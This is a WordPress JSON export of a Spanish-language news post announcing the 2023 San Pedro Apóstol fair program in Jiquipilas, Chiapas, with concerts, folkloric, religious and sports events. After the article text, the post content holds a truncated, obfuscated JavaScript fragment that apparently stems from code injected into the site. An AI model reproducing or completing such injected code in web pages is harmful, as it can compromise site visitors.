{"id":10556,"date":"2023-06-14T04:07:11","date_gmt":"2023-06-14T04:07:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10556"},"modified":"2023-06-14T04:07:11","modified_gmt":"2023-06-14T04:07:11","slug":"hugo-lazaro-y-madely-montejo-anuncian-espectacular-feria-de-san-pedro-apostol-2023","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10556","title":{"rendered":"Hugo L\u00e1zaro y Madely Montejo anuncian espectacular Feria de San Pedro Ap\u00f3stol 2023"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230613-WA0072-1024x576.jpg\" alt=\"\" class=\"wp-image-10557\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230613-WA0072-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230613-WA0072-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230613-WA0072-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230613-WA0072.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>29 de junio se presenta la Banda MS, adem\u00e1s de otras agrupaciones, eventos culturales, deportivos y religiosos.<\/li>\n<\/ul>\n\n\n\n<p>Jiquipilas, Chiapas. \u2013 El Presidente Municipal C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez anunci\u00f3 la cartelera de la Feria de San Pedro Ap\u00f3stol 2023, donde destac\u00f3 la presentaci\u00f3n para el 29 de junio de la Banda MS, por lo que promete ser una de las mejores de los \u00faltimos a\u00f1os.<\/p>\n\n\n\n<p>Junto a su esposa y Presidenta del DIF Madely Montejo Maza, el Alcalde adelant\u00f3 que en esta feria se puso todo el esfuerzo del Gobierno Municipal porque el pueblo de Jiquipilas se merece un buen espect\u00e1culo.<\/p>\n\n\n\n<p>Revel\u00f3 que el 27 de junio el grupo tropical de Veracruz M\u00e1ster Kumbia pondr\u00e1 a bailar a todos los jiquipiltecos, el 28 se presentar\u00e1n Los Socios del Ritmo y el 30 de junio esta por confirmarse el artista especial que promete ser tambi\u00e9n de agrado para todo el p\u00fablico.<\/p>\n\n\n\n<p>Es importante mencionar, que el 1 de julio habr\u00e1 un espect\u00e1culo de rodeo de media noche con \u201cRancho Cacho Mocho\u201d, el cual ser\u00e1 amenizado por la Banda La Ejecutiva.<\/p>\n\n\n\n<p>Durante la conferencia de Prensa estuvo presente el promotor musical Fernando Ugarte. Aqu\u00ed se anunci\u00f3 tambi\u00e9n que el rompimiento de feria religioso ser\u00e1 el 19 de junio.<\/p>\n\n\n\n<p>Se dio a conocer que el 27 de junio se presentar\u00e1n los eventos folcl\u00f3ricos en la Casa de la Cultura con las agrupaciones de Jiquipilas y Comit\u00e1n, el 28 el grupo folcl\u00f3rico de Copainal\u00e1, el 29 el grupo folcl\u00f3rico de Tapanatepec Oaxaca, el 30 de junio el grupo folcl\u00f3rico Tuxtlan, el grupo folcl\u00f3rico de Palenque y el d\u00eda 2 de julio el duelo de marimbas con las agrupaciones del tecnol\u00f3gico de Comit\u00e1n, Pijijiapan, Jiquipilas y Tonal\u00e1.<\/p>\n\n\n\n<p>En cuanto a las actividades deportivas, se desarrollar\u00e1 el campeonato estatal de escuelas deportivas copa San Pedro Ap\u00f3stol del 23 al 25 de junio, campeonato de box, estatal de maxibalnciesto de veteranos categor\u00edas varonil y femenil, cabalgata s\u00e1bado 1 de julio, Copa Telmex categor\u00eda femenil libre, el 2 de julio habr\u00e1 evento deportivo con D\u00fao Athlon y carrera pedestre.<\/p>\n\n\n\n<p>Destac\u00f3 que en la Unidad Deportiva se instalar\u00e1 el parque Feria, por lo que ah\u00ed el pueblo podr\u00e1 disfrutar de los juegos mec\u00e1nicos, los tradicionales puestos, vendimias y dem\u00e1s color y sabor que identifica a la Feria de San Pedro Ap\u00f3stol, por lo que el Edil Hugo L\u00e1zaro reiter\u00f3 la invitaci\u00f3n a todo el p\u00fablico en general.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>29 de junio se presenta la Banda MS, adem\u00e1s de otras agrupaciones, eventos culturales, deportivos y religiosos. Jiquipilas, Chiapas. \u2013 El Presidente Municipal C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez anunci\u00f3 la cartelera de la Feria de San Pedro Ap\u00f3stol 2023, donde destac\u00f3 la presentaci\u00f3n para el 29 de junio de la Banda MS, por lo que promete &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10557,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10556","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10556","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10556"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10556\/revisions"}],"predecessor-version":[{"id":10558,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10556\/revisions\/10558"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10557"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10556"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10556"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10556"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}